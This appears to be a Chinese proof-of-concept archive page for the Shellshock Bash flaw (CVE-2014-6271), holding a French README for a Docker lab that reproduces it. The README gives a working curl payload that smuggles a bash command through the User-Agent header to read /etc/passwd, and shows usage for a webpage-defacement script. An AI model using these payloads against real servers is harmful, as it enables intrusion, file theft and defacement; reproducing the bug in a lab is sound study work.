关联漏洞
标题:
GNU Bash 远程代码执行漏洞
(CVE-2014-6271)
描述:GNU Bash是美国软件开发者布莱恩-福克斯(Brian J. Fox)为GNU计划而编写的一个Shell(命令语言解释器),它运行于类Unix操作系统中(Linux系统的默认Shell),并能够从标准输入设备或文件中读取、执行命令,同时也结合了一部分ksh和csh的特点。 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:OpenSSH sshd中的ForceComman
介绍
# CVE-2014-6271
## Description
Ce projet permet de reproduire la vulnérabilité **CVE-2014-6271**, également connue sous le nom de **Shellshock**. Shellshock est une vulnérabilité de sécurité dans Bash qui permet d'exécuter du code malveillant via des variables d'environnement.
Le but de ce projet est de démontrer l'impact de cette vulnérabilité sur un environnement Docker.
## Prérequis
Avant de commencer, assurez-vous d'avoir Docker installé sur votre machine. Vous pouvez télécharger Docker [ici](https://www.docker.com/get-started).
## Installation et lancement
### 1. Construire l'image Docker
Dans le répertoire du projet, construisez l'image Docker en exécutant la commande suivante :
```bash
docker build -t ['image name'] .
```
Remplacez `['image name']` par le nom que vous souhaitez donner à l'image Docker.
### 2. Lancer le conteneur Docker
Une fois l'image construite, lancez un conteneur à partir de cette image avec la commande suivante :
```bash
docker run -it --rm -p 8080:80 ['image name']
```
Cela exposera le service sur le port 8080 de votre machine locale.
### 3. Accéder à l'application
Ouvrez votre navigateur et accédez à `http://localhost:8080`. Vous pourrez observer le comportement de l'application et tester la vulnérabilité.
### 4-1. Exploiter la vulnérabilité
Dans un autre terminal, exécutez la commande suivante pour exploiter la vulnérabilité et lire le contenu du fichier `/etc/passwd` :
```bash
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
```
Cette commande envoie un en-tête `user-agent` spécialement conçu pour exploiter Shellshock. Si la vulnérabilité est correctement reproduite, le contenu de `/etc/passwd` s'affichera dans la sortie du terminal.
### 4-2. Exploiter la vulnérabilité (script exp_deface.sh)
Ce script permet d'exploiter la pour défacer une page web cible. La vulnérabilité repose sur une mauvaise configuration de scripts CGI, qui permet l'exécution de commandes arbitraires sur le serveur.
Pré-requis :
Assurez-vous que la cible est vulnérable au bug ShellShock.
Assurez-vous d'avoir les permissions nécessaires pour tester l'exploit sur cette cible.
```bash
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
```
## Sécurité
**Important :** Cette vulnérabilité ne doit être utilisée qu'à des fins de test et de démonstration dans un environnement contrôlé. N'utilisez pas ce projet dans des environnements de production.
文件快照
[4.0K] /data/pocs/fd3e8302ab75b55357288a7dba51b8dcb1c17a41
├── [ 791] Dockerfile
├── [ 512] exp_deface.sh
├── [ 292] index.html
├── [ 49] main.sh
├── [4.0K] packages
│ └── [1.4M] bash_4.2%2Bdfsg-0.1_amd64.deb
├── [1.3M] PresentationRSSI.pdf
├── [2.5K] README.md
├── [ 12K] shellshock.png
└── [ 61] vulnerable
1 directory, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。